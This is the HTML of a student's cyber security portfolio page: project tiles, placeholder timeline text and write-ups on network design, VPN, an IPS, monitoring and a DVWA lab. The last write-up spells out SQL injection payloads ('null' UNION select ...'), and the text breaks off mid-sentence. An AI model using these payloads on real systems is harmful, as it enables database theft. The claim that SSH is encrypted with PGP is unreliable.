          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
